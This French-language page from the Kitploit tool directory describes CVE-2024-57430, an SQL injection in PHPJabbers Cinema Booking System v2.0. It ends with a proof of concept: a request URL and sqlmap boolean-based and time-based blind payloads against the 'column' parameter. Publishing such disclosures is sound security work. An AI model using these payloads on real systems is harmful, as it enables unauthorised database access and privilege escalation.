Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2024-57430 — CVE-2024-57430 : PHPJabbers Cinema Booking System v2.0 est vulnérable à l'injection SQL, entraînant un accès non autorisé aux données et une élévation de privilèges. | Kitploit
Outils/GitHubGitHub/ahrixia/cve-2024-57430
Analyse des VulnérabilitésExploitationExploitation d'Applications WebCollecte d'InformationsTests d'IntrusionSécurité des Bases de Données
GitHubahrixia/cve-2024-57430

CVE-2024-57430

CVE-2024-57430 : PHPJabbers Cinema Booking System v2.0 est vulnérable à l'injection SQL, entraînant un accès non autorisé aux données et une élévation de privilèges.

Voir le dépôt
2il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2024-57430

Une vulnérabilité d'injection SQL dans la fonction pjActionGetUser du système de réservation de cinéma PHPJabbers Cinema Booking System v2.0 permet aux attaquants de manipuler les requêtes de base de données via le paramètre column. L'exploitation de cette faille peut conduire à une divulgation non autorisée d'informations, à une élévation de privilèges ou à une manipulation de la base de données.

Paramètre vulnérable : column

Impact :

L'injection SQL peut conduire à un accès non autorisé à des informations sensibles, à une modification de la base de données, et même à un compromis total du serveur de base de données. Cela constitue une menace critique pour la confidentialité, l'intégrité et la disponibilité de l'application.

Exploit - Preuve de concept (POC)

Injection SQL

Requête GET sur l'URL : http://127.0.0.1/CinemaBookingDev/index.php?controller=pjAdminUsers&action=pjActionGetUser&column=*&&direction=ASC&page=1&rowCount=10

SQLMAP sur le paramètre column

root@kitploit:~
Parameter: #1* (URI)
  Type: boolean-based blind
  Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
  Payload: http://127.0.0.1/CinemaBookingDev/index.php?controller=pjAdminUsers&action=pjActionGetUser&column=name RLIKE (SELECT (CASE WHEN (7874=7874) THEN 0x6e616d65 ELSE 0x28 END))&direction=ASC&page=1&rowCount=10

  Type: time-based blind
  Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
  Payload: http://127.0.0.1/CinemaBookingDev/index.php?controller=pjAdminUsers&action=pjActionGetUser&column=name AND (SELECT 6530 FROM (SELECT(SLEEP(5)))UFOj)&direction=ASC&page=1&rowCount=10
Télécharger l’outil